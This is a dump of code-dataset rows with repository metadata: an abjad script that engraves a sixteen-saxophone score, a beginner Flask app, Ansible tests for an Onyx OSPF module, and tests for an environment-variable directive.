abjad.Staff([abjad.Voice(name='Voice 6')],name='Staff 6', lilypond_type='Staff',),
abjad.Staff([abjad.Voice(name='Voice 7')],name='Staff 7', lilypond_type='Staff',),
abjad.Staff([abjad.Voice(name='Voice 8')],name='Staff 8', lilypond_type='Staff',),
abjad.Staff([abjad.Voice(name='Voice 9')],name='Staff 9', lilypond_type='Staff',),
abjad.Staff([abjad.Voice(name='Voice 10')],name='Staff 10', lilypond_type='Staff',),
abjad.Staff([abjad.Voice(name='Voice 11')],name='Staff 11', lilypond_type='Staff',),
abjad.Staff([abjad.Voice(name='Voice 12')],name='Staff 12', lilypond_type='Staff',),
abjad.Staff([abjad.Voice(name='Voice 13')],name='Staff 13', lilypond_type='Staff',),
abjad.Staff([abjad.Voice(name='Voice 14')],name='Staff 14', lilypond_type='Staff',),
abjad.Staff([abjad.Voice(name='Voice 15')],name='Staff 15', lilypond_type='Staff',),
abjad.Staff([abjad.Voice(name='Voice 16')],name='Staff 16', lilypond_type='Staff',),
],
name='Staff Group',
)
])
# Teach each of the staves how to draw analysis brackets
for staff in score['Staff Group']:
staff.consists_commands.append('Horizontal_bracket_engraver')
# Add skips and time signatures to the global context
for time_signature in time_signatures:
skip = abjad.Skip(1)
abjad.attach(abjad.Multiplier(time_signature), skip)
abjad.attach(time_signature, skip)
score['Global Context'].append(skip)
# Define a helper function that takes a rhythm maker and some durations and
# outputs a container. This helper function also adds LilyPond analysis
# brackets to make it clearer where the phrase and sub-phrase boundaries are.
print('Making containers ...')
def make_container(rhythm_maker, durations):
selections = rhythm_maker(durations)
container = abjad.Container([])
container.extend(selections)
# # Add analysis brackets so we can see the phrasing graphically
# start_indicator = abjad.LilyPondLiteral('\startGroup', format_slot='after')
# stop_indicator = abjad.LilyPondLiteral('\stopGroup', format_slot='after')
# for cell in selections:
# cell_first_leaf = abjad.select(cell).leaves()[0]
# cell_last_leaf = abjad.select(cell).leaves()[-1]
# abjad.attach(start_indicator, cell_first_leaf)
# abjad.attach(stop_indicator, cell_last_leaf)
# # The extra space in the literals is a hack around a check for whether an
# # identical object has already been attached
# start_indicator = abjad.LilyPondLiteral('\startGroup ', format_slot='after')
# stop_indicator = abjad.LilyPondLiteral('\stopGroup ', format_slot='after')
# phrase_first_leaf = abjad.select(container).leaves()[0]
# phrase_last_leaf = abjad.select(container).leaves()[-1]
# abjad.attach(start_indicator, phrase_first_leaf)
# abjad.attach(stop_indicator, phrase_last_leaf)
return container
# Loop over the timespan list dictionaries, spitting out pairs of voice
# names and per-voice timespan lists. Group timespans into phrases, with
# all timespans in each phrase having an identical rhythm maker. Run the
# rhythm maker against the durations of the timespans in the phrase and
# add the output to the voice with the timespan lists's voice name.
def key_function(timespan):
"""
Get the timespan's annotation's rhythm-maker.
If the annotation's rhythm-maker is None, return the silence maker.
"""
return timespan.annotation.rhythm_maker or silence_maker
for voice_name, timespan_list in all_timespan_lists.items():
for rhythm_maker, grouper in itertools.groupby(
timespan_list,
key=key_function,
):
# We know the voice name of each timespan because a) the timespan
# list is in a dictionary, associated with that voice name and b)
# each timespan's annotation is a MusicSpecifier instance which
# knows the name of the voice the timespan should be used for.
# This double-reference to the voice is redundant here, but in a
# different implementation we could put *all* the timespans into
# one timespan list, split them, whatever, and still know which
# voice they belong to because their annotation records that
# information.
durations = [timespan.duration for timespan in grouper]
container = make_container(rhythm_maker, durations)
voice = score[voice_name]
voice.append(container)
print('Splitting and rewriting ...')
# split and rewite meters
for voice in abjad.iterate(score['Staff Group']).components(abjad.Voice):
for i , shard in enumerate(abjad.mutate(voice[:]).split(time_signatures)):
time_signature = time_signatures[i]
abjad.mutate(shard).rewrite_meter(time_signature)
print('Beautifying score ...')
# cutaway score
for staff in abjad.iterate(score['Staff Group']).components(abjad.Staff):
for selection in abjad.select(staff).components(abjad.Rest).group_by_contiguity():
start_command = abjad.LilyPondLiteral(
r'\stopStaff \once \override Staff.StaffSymbol.line-count = #1 \startStaff',
format_slot='before',
)
stop_command = abjad.LilyPondLiteral(
r'\stopStaff \startStaff',
format_slot='after',
)
abjad.attach(start_command, selection[0])
abjad.attach(stop_command, selection[-1])
# Make pitches
print('Adding pitch material ...')
def cyc(lst):
count = 0
while True:
yield lst[count%len(lst)]
count += 1
#attach instruments and clefs
print('Adding attachments ...')
bar_line = abjad.BarLine('||')
metro = abjad.MetronomeMark((1, 4), 90)
markup = abjad.Markup(r'\bold { Invocation }')
mark = abjad.RehearsalMark(markup=markup)
instruments = cyc([
abjad.SopraninoSaxophone(),
abjad.SopranoSaxophone(),
abjad.SopranoSaxophone(),
abjad.SopranoSaxophone(),
abjad.AltoSaxophone(),
abjad.AltoSaxophone(),
abjad.AltoSaxophone(),
abjad.TenorSaxophone(),
abjad.TenorSaxophone(),
abjad.TenorSaxophone(),
abjad.BaritoneSaxophone(),
abjad.BaritoneSaxophone(),
abjad.BaritoneSaxophone(),
abjad.BassSaxophone(),
abjad.BassSaxophone(),
abjad.ContrabassSaxophone(),
])
abbreviations = cyc([
abjad.MarginMarkup(markup=abjad.Markup('spro.'),),
abjad.MarginMarkup(markup=abjad.Markup('spr.1'),),
abjad.MarginMarkup(markup=abjad.Markup('spr.2'),),
abjad.MarginMarkup(markup=abjad.Markup('spr.3'),),
abjad.MarginMarkup(markup=abjad.Markup('alt.1'),),
abjad.MarginMarkup(markup=abjad.Markup('alt.2'),),
abjad.MarginMarkup(markup=abjad.Markup('alt.3'),),
abjad.MarginMarkup(markup=abjad.Markup('ten.1'),),
abjad.MarginMarkup(markup=abjad.Markup('ten.2'),),
abjad.MarginMarkup(markup=abjad.Markup('ten.3'),),
abjad.MarginMarkup(markup=abjad.Markup('bar.1'),),
abjad.MarginMarkup(markup=abjad.Markup('bar.2'),),
abjad.MarginMarkup(markup=abjad.Markup('bar.3'),),
abjad.MarginMarkup(markup=abjad.Markup('bs.1'),),
abjad.MarginMarkup(markup=abjad.Markup('bs.2'),),
abjad.MarginMarkup(markup=abjad.Markup('cbs.'),),
])
names = cyc([
abjad.StartMarkup(markup=abjad.Markup('Sopranino'),),
abjad.StartMarkup(markup=abjad.Markup('Soprano 1'),),
abjad.StartMarkup(markup=abjad.Markup('Soprano 2'),),
abjad.StartMarkup(markup=abjad.Markup('Soprano 3'),),
abjad.StartMarkup(markup=abjad.Markup('Alto 1'),),
abjad.StartMarkup(markup=abjad.Markup('Alto 2'),),
abjad.StartMarkup(markup=abjad.Markup('Alto 3'),),
abjad.StartMarkup(markup=abjad.Markup('Tenor 1'),),
abjad.StartMarkup(markup=abjad.Markup('Tenor 2'),),
abjad.StartMarkup(markup=abjad.Markup('Tenor 3'),),
abjad.StartMarkup(markup=abjad.Markup('Baritone 1'),),
abjad.StartMarkup(markup=abjad.Markup('Baritone 2'),),
abjad.StartMarkup(markup=abjad.Markup('Baritone 3'),),
abjad.StartMarkup(markup=abjad.Markup('Bass 1'),),
abjad.StartMarkup(markup=abjad.Markup('Bass 2'),),
abjad.StartMarkup(markup=abjad.Markup('Contrabass'),),
])
for staff in abjad.iterate(score['Staff Group']).components(abjad.Staff):
leaf1 = abjad.select(staff).leaves()[0]
abjad.attach(next(instruments), leaf1)
abjad.attach(next(abbreviations), leaf1)
abjad.attach(next(names), leaf1)
for staff in abjad.select(score['Staff Group']).components(abjad.Staff)[0]:
leaf1 = abjad.select(staff).leaves()[0]
last_leaf = abjad.select(staff).leaves()[-1]
abjad.attach(metro, leaf1)
abjad.attach(bar_line, last_leaf)
for staff in abjad.iterate(score['Global Context']).components(abjad.Staff):
leaf1 = abjad.select(staff).leaves()[0]
abjad.attach(mark, leaf1)
for staff in abjad.iterate(score['Staff Group']).components(abjad.Staff):
abjad.Instrument.transpose_from_sounding_pitch(staff)
# Make a lilypond file and show it:
score_file = abjad.LilyPondFile.new(
score,
includes=['first_stylesheet.ily'],
)
print("Made Score File")
# Comment measure numbers - this function is in the baca.SegmentMaker, not abjad.SegmentMaker
# abjad.SegmentMaker.comment_measure_numbers(score)
###################
# #print(format(score_file))
# directory = '/Users/evansdsg2/Scores/guerrero/Test'
# pdf_path = f'{directory}/Test.pdf'
# path = pathlib.Path('Test.pdf')
# if path.exists():
# print(f'Removing {pdf_path} ...')
# path.unlink()
# time_1 = time.time()
# print(f'Persisting {pdf_path} ...')
# result = abjad.persist(score_file).as_pdf(pdf_path)
# print(result[0])
# print(result[1])
# print(result[2])
# success = result[3]
# if success is False:
# print('LilyPond failed!')
# time_2 = time.time()
# total_time = time_2 - time_1
# print(f'Total time: {total_time} seconds')
# if path.exists():
# print(f'Opening {pdf_path} ...')
# os.system(f'open {pdf_path}')
# for staff in abjad.iterate(score['Staff Group']).components(abjad.Staff):
# abjad.show(staff)
print("Showing Score")
abjad.show(score)
| [
"ivan.alexander.moscotta@gmail.com"
] | ivan.alexander.moscotta@gmail.com |
eabad72c1ca5058e9e7cc8a1c52c7ef1240c9e36 | 4c2f47ea3e254c2251861fc93b9815f7cbb42921 | /flask/flask sample/helloworld.py | c431a1ae10637775dfa973dd347b4f8a372041b7 | [] | no_license | Devanand072001/python-tutorials | c719c6c9637a5efd86a07aa28cad5cad45593283 | a873906030da2b197a64bfbd3f15cae1accc55e7 | refs/heads/main | 2023-06-20T04:18:30.997558 | 2021-07-21T07:34:30 | 2021-07-21T07:34:30 | 388,032,646 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 819 | py | from flask import Flask, render_template
app = Flask(__name__)
name = "devanand"
thisdict = {
"brand": "Ford",
"model": "Mustang",
"year": 1964
}
class Employee:
def __init__(self, name, age, salary):
self.name = name
self.age = age
self.salary = salary
employee1 = Employee("devanand", 19, 50_000)
employee2 = Employee("bob", 17, 55_000)
@app.route('/')
@app.route("/home")
def home():
return render_template("home.html", name=name)
@app.route("/about")
def about():
# return "<center><h1>about page</h1></center>"
return render_template("about.html", thisdict=thisdict,name=name)
@app.route("/employee")
def employee():
return render_template("employee.html",emp1=employee1,emp2= employee2)
if __name__ == "__main__":
app.run(debug=True)
| [
"devanand.cs19@bitsathy.ac.in"
] | devanand.cs19@bitsathy.ac.in |
c7e0e8f56c9b540a6d37dce314d31c36ea920326 | 27e890f900bd4bfb2e66f4eab85bc381cf4d5d3f | /tests/unit/modules/network/onyx/test_onyx_ospf.py | 665633222c74febcc7f196f3e51d0f6b0b91d4fb | [] | no_license | coll-test/notstdlib.moveitallout | eb33a560070bbded5032385d0aea2f3cf60e690b | 0987f099b783c6cf977db9233e1c3d9efcbcb3c7 | refs/heads/master | 2020-12-19T22:28:33.369557 | 2020-01-23T18:51:26 | 2020-01-23T18:51:26 | 235,865,139 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,664 | py | #
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.notstdlib.moveitallout.tests.unit.compat.mock import patch
from ansible_collections.notstdlib.moveitallout.plugins.modules import onyx_ospf
from ansible_collections.notstdlib.moveitallout.tests.unit.modules.utils import set_module_args
from ..onyx_module import TestOnyxModule, load_fixture
class TestOnyxOspfModule(TestOnyxModule):
module = onyx_ospf
def setUp(self):
super(TestOnyxOspfModule, self).setUp()
self._ospf_exists = True
self.mock_get_config = patch.object(
onyx_ospf.OnyxOspfModule,
"_get_ospf_config")
self.get_config = self.mock_get_config.start()
self.mock_get_interfaces_config = patch.object(
onyx_ospf.OnyxOspfModule,
"_get_ospf_interfaces_config")
self.get_interfaces_config = self.mock_get_interfaces_config.start()
self.mock_load_config = patch(
'ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.onyx.onyx.load_config')
self.load_config = self.mock_load_config.start()
def tearDown(self):
super(TestOnyxOspfModule, self).tearDown()
self.mock_get_config.stop()
self.mock_load_config.stop()
def load_fixtures(self, commands=None, transport='cli'):
if self._ospf_exists:
config_file = 'onyx_ospf_show.cfg'
self.get_config.return_value = load_fixture(config_file)
config_file = 'onyx_ospf_interfaces_show.cfg'
self.get_interfaces_config.return_value = load_fixture(config_file)
else:
self.get_config.return_value = None
self.get_interfaces_config.return_value = None
self.load_config.return_value = None
def test_ospf_absent_no_change(self):
set_module_args(dict(ospf=3, state='absent'))
self.execute_module(changed=False)
def test_ospf_present_no_change(self):
interface = dict(name='Loopback 1', area='0.0.0.0')
set_module_args(dict(ospf=2, router_id='10.2.3.4',
interfaces=[interface]))
self.execute_module(changed=False)
def test_ospf_present_remove(self):
set_module_args(dict(ospf=2, state='absent'))
commands = ['no router ospf 2']
self.execute_module(changed=True, commands=commands)
def test_ospf_change_router(self):
interface = dict(name='Loopback 1', area='0.0.0.0')
set_module_args(dict(ospf=2, router_id='10.2.3.5',
interfaces=[interface]))
commands = ['router ospf 2', 'router-id 10.2.3.5', 'exit']
self.execute_module(changed=True, commands=commands, sort=False)
def test_ospf_remove_router(self):
interface = dict(name='Loopback 1', area='0.0.0.0')
set_module_args(dict(ospf=2, interfaces=[interface]))
commands = ['router ospf 2', 'no router-id', 'exit']
self.execute_module(changed=True, commands=commands, sort=False)
def test_ospf_add_interface(self):
interfaces = [dict(name='Loopback 1', area='0.0.0.0'),
dict(name='Loopback 2', area='0.0.0.0')]
set_module_args(dict(ospf=2, router_id='10.2.3.4',
interfaces=interfaces))
commands = ['interface loopback 2 ip ospf area 0.0.0.0']
self.execute_module(changed=True, commands=commands)
def test_ospf_remove_interface(self):
set_module_args(dict(ospf=2, router_id='10.2.3.4'))
commands = ['interface loopback 1 no ip ospf area']
self.execute_module(changed=True, commands=commands)
def test_ospf_add(self):
self._ospf_exists = False
interfaces = [dict(name='Loopback 1', area='0.0.0.0'),
dict(name='Vlan 210', area='0.0.0.0'),
dict(name='Eth1/1', area='0.0.0.0'),
dict(name='Po1', area='0.0.0.0')]
set_module_args(dict(ospf=2, router_id='10.2.3.4',
interfaces=interfaces))
commands = ['router ospf 2', 'router-id 10.2.3.4', 'exit',
'interface loopback 1 ip ospf area 0.0.0.0',
'interface vlan 210 ip ospf area 0.0.0.0',
'interface ethernet 1/1 ip ospf area 0.0.0.0',
'interface port-channel 1 ip ospf area 0.0.0.0']
self.execute_module(changed=True, commands=commands)
| [
"wk@sydorenko.org.ua"
] | wk@sydorenko.org.ua |
19048b8bffc93528dd413a6f873ed1b800c384e0 | f9f918f990958744398b8a3d4bc8f6394d801ca6 | /hilo_rpc/tests/serialize/test_directive.py | 2a94911c6069b5887a67c587c5e6e40b7fa2c527 | [] | no_license | eaugeas/hilo-tfx | bfceb6e8cabc4568eb8c8b32bdb67c3b7be52db4 | c7f3b013db3a0f07c9e61b00e137d89e7189ead1 | refs/heads/master | 2022-04-15T23:22:40.611827 | 2020-04-16T17:10:29 | 2020-04-16T17:10:29 | 246,938,252 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,030 | py | import unittest
import os
from hilo_rpc.serialize.directive import EnvironDirective
class DirectiveTest(unittest.TestCase):
def test_environ_directive_ok_use_passed_env(self):
directive = EnvironDirective('env', *['$PROPERTY'],
**{'env': {
'PROPERTY': 'VALUE'
}})
value = directive.execute()
self.assertEqual(value, 'VALUE')
def test_environ_directive_ok_use_os_environ(self):
os.environ['PROPERTY'] = 'VALUE'
directive = EnvironDirective('env', *['$PROPERTY'],
**{'use_os_environ': True})
value = directive.execute()
self.assertEqual(value, 'VALUE')
def test_environ_directive_fail_no_env_variable(self):
directive = EnvironDirective('env', *['$PROPERTY'], **{'env': {}})
with self.assertRaises(KeyError):
directive.execute()
if __name__ == '__main__':
unittest.main()
| [
"noreply@github.com"
] | eaugeas.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.